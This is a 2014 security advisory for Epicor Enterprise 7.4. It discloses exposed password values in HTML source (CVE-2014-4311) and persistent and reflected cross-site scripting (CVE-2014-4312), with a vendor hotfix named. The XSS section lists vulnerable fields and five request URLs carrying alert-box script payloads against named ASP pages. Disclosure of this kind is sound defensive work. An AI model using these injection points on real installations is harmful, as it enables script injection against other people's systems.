Skip to content
cyberexploits
webappasptext

Epicor Enterprise 7.4 - Multiple Vulnerabilities

Epicor Enterprise 7.4 - Multiple Vulnerabilities

Published on 2014-10-02

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/asp/webapps/34864.txt7eac4c3a
raw
"Epicor Enterprise vulnerabilities"



- Affected vendor: Epicor Software Corporation

- Affected system: Epicor Enterprise - Version 7.4

- Vendor disclosure date: May 13th, 2014

- Public disclosure date: September 30th, 2014

- Status: Fixed



- Associated CVEs:

  

  1) CVE-2014-4311

  Password values not masked appropriately:

  Even though the application appears to be masking the affected password values

in the database connection and email settings page, it is possible to access

their content by observing the HTML code.

  

  Affected password values:

  - “Database Connection”

  - “E-mail Connection”



  Associated CAPEC:

  CAPEC-167: Lifting Sensitive Data from the Client -

https://capec.mitre.org/data/definitions/167.html

  

  Associated CWE:

  CWE-200: Information Exposure - http://cwe.mitre.org/data/definitions/200.html

  

  2) CVE-2014-4312

  Persistent and reflective cross-site scripting (XSS) attacks possible:

  The identified website is vulnerable to persistent and reflective cross-site

scripting. Script injection is a weakness within an application, and is due to

insufficient validation of the input data (i.e. input data being sent from the

user/presentation layer) and output encoding allowing dynamic execution of

scripts on the application front end resulting in anomalous/abnormal behaviour

of the application.

  

  Example of affected functionalities for persistent XSS:

   - 1. While viewing Order details, and injecting a malicious payload on the

"Notes" section.

   - 2. While modifying an “Order to consume” and injecting a malicious payload

on the "Description" section.

   - 3. While observing the “Favorites” section and and injecting a malicious

payload on the “Favorites name” section.

     Example of an injected payload: <script>alert("XSS")</script>

  

  Example of affected URLs for reflective XSS:

  - 1.

https://XXXXX/Procurement/EKPHTML/search_item_bt.asp?RecordsRequested=Yes&FiltPartNo=&FiltSupplier=-1&FiltKeyword=<script>alert("XSS")</script>

  - 2.

https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Budget/ImportBudget_fr.asp?Act=dtt"><script>alert("XSS")</script>

  - 3. https://XXXXX

/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnPageName=UserSearch&hdnOpenerFormName=PrefApp&hdnApproverFieldName=temp1&hdnApproverIDFieldName=temp2&hdnUserID=200&hdnOpener=Test"><script>alert("XSS")</script>

  - 4.

https://XXXXX/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnOpenerFormName=PrefApp&hdnApproverFieldName="><script>alert("XSS")</script>

  - 5.

https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Codes.asp?INTEGRATED=XSS">--><script>alert("XSS")</script>



  Associated CAPEC:

  CAPEC-32: Embedding Scripts in HTTP Query Strings -

https://capec.mitre.org/data/definitions/32.html

  

  Associated CWE:

  CWE-79: Improper Neutralization of Input During Web Page Generation

('Cross-site Scripting') - http://cwe.mitre.org/data/definitions/79.html



- Available fix:

  Epicor Enterprise Hotfix: FS74SP6_HotfixTL054181

 

- Credit:

  These vulnerabilities were discovered by Fara Rustein.

  If you have any questions, comments, concerns, updates or suggestions please

contact Fara Rustein (TW: @fararustein).
View on GitHub